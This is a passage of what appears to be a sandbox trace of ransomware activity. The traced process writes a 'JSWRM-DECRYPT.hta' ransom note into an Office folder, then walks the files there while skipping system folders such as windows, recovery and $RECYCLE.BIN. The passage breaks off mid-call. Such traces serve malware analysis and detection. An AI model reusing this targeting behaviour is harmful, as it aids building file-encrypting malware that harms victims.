WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0073.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0073.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0073.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0073.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0073.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0073.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0073.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0073.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\client\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0073.017] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.017] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0073.018] CloseHandle (hObject=0x458) returned 1 [0073.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0073.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0073.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0073.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0073.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0073.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0073.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0073.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0073.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0073.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\client\\jswrm-decrypt.hta")) returned 0x20 [0073.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0073.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0073.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0073.019] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2ca2e08, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x222fce18, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0073.019] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0073.019] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2ca2e08, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x222fce18, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0073.019] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0073.019] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0073.019] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0715cb9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0715cb9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0952017, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2=".") returned 1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="..") returned 1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="...") returned 1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="windows") returned -1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="recovery") returned -1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="perflogs") returned -1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="documents and settings") returned -1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="system volume information") returned -1 [0073.019] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="msocache") returned -1 [0073.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0073.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0073.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0073.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x240fc0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 31 [0073.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0073.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0073.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0073.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0073.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x2412e0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 31 [0073.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0073.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0073.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0073.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0073.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0073.020] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0952017, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0952017, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0a832cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2=".") returned 1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="..") returned 1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="...") returned 1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="windows") returned -1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="recovery") returned -1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="perflogs") returned -1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="documents and settings") returned -1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="system volume information") returned -1 [0073.020] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="msocache") returned -1 [0073.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0073.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0073.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0073.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241128, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0073.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0073.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0073.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0073.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0073.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0073.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0073.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0073.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0073.021] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd089348e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd089348e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd09c4608, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2=".") returned 1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="..") returned 1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="...") returned 1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="windows") returned -1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="recovery") returned -1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="perflogs") returned -1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="documents and settings") returned -1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="system volume information") returned -1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="msocache") returned -1 [0073.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0073.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0073.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-localization-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 39 [0073.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0073.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0073.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0073.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-localization-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 39 [0073.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0073.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0073.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0073.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.021] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd115de42, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd115de42, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd158a009, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="AP750A~1.DLL")) returned 1 [0073.021] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2=".") returned 1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="..") returned 1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="...") returned 1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="windows") returned -1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="recovery") returned -1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="perflogs") returned -1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="documents and settings") returned -1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="system volume information") returned -1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="msocache") returned -1 [0073.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0073.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0073.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 41 [0073.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0073.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0073.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0073.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 41 [0073.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0073.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0073.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0073.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.022] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0d0baf0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0d0baf0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0eaf4e3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="APF10C~1.DLL")) returned 1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2=".") returned 1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="..") returned 1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="...") returned 1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="windows") returned -1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="recovery") returned -1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="perflogs") returned -1 [0073.022] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="documents and settings") returned -1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="system volume information") returned -1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="msocache") returned -1 [0073.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0073.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0073.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 32 [0073.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0073.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0073.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0073.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 32 [0073.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0073.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0073.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0073.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.023] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0c4cdf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0c4cdf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0df0820, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2=".") returned 1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="..") returned 1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="...") returned 1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="windows") returned -1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="recovery") returned -1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.023] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="msocache") returned -1 [0073.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0073.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", 